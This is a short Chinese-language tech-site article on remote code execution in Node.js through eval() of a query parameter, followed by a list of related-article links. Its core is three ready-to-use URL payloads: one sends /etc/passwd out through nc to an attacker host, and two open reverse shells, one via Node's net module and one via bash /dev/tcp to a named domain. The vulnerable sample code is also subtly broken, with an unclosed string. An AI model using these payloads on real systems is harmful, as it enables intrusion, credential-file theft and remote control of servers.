NodeJS远程代码执行
更新时间:2016年08月28日 15:30:03 投稿:hebedich
这篇文章主要介绍了NodeJS远程代码执行方法的相关资料,需要的朋友可以参考下
背景
@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。
测试
var express = require('express');
var app = express();
app.get('/', function (req, res) {
res.send('Hello eval(req.query.q));
console.log(req.query.q);
});
app.listen(8080, function () {
console.log('Example listening on port 8080!');
});
任意文件读取
http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
GET SHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
GET SHELL2
http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')
相关文章
Nodejs进阶:如何将图片转成datauri嵌入到网页中去实例
这篇文章主要介绍了Nodejs进阶:如何将图片转成datauri嵌入到网页中去,有兴趣的可以了解一下。2016-11-11
今天小编就为大家分享一篇NodeJs搭建本地服务器之使用手机访问的实例讲解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧2018-05-05
这篇文章主要介绍了13 个npm 快速开发技巧,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2019-07-07
这篇文章主要介绍了详解nodejs 文本操作模块-fs模块(一),本篇文章详细的介绍了文件及目录的读写操作,有兴趣的可以了解一下。2016-12-12
本篇文章主要介绍了详解nodejs微信jssdk后端接口,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-05-05
本文通过几个具体实例来分析讲解了node.js中require的使用方法,非常的详尽,这里推荐给大家2014-12-12
在我们前端开发工程中,很多繁琐机械的操作都是会慢慢的被抽离出来的,比如当我们为dom操作和浏览器兼容性感到厌烦时,jQuery出现了,随着时间的发展,JavaScript现在被应用到了服务器中,但是首先第一步我们要学会如何安装配置Node.js的环境,本文是使用nvm方式,来一起看看。2016-10-10
这篇文章主要介绍了node.js核心模块有哪些,对node.js感兴趣的同学,可以参考下2021-04-04
nodejs npm错误Error:UNKNOWN:unknown error,mkdir ''D:\Develop\n
今天小编就为大家分享一篇关于nodejs npm错误Error:UNKNOWN:unknown error,mkdir 'D:\Develop\nodejs\node_global'at Error,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧2019-03-03
这篇文章主要介绍了基于Nodejs的Tcp封包和解包的理解,详细的介绍了tcp的分包与拆包并实现,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2018-09-09
最新评论